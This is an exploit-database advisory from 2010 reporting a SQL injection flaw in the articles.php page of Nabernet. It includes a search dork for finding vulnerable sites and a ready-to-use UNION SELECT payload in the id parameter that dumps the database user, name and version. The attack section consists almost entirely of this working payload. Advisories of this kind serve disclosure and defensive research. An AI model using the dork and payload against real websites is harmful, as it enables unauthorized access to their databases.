Nabernet (articles.php) Sql Injection Vulnerability

2010-02-18 / 2010-02-19
Credit: AtT4CKxT3rR0r1ST
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Nabernet (articles.php) Sql Injection Vulnerability ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Home : www.sec-attack.com/vb [Sec Attack Team] .:. Bug Type : Sql Injection[Mysql] .:. Dork : "powered by Nabernet" #################################################################### ===[ Exploit ]=== www.site.com/articles.php?id=null[Sql] www.site.com/articles.php?id=null'+and+1=2+union+select+null,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,null,null,null,null,null,null-- - #################################################################### ________________________________ Hotmail: Trusted email with powerful SPAM protection. Sign up now.<https://signup.live.com/signup.aspx?id=60969>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top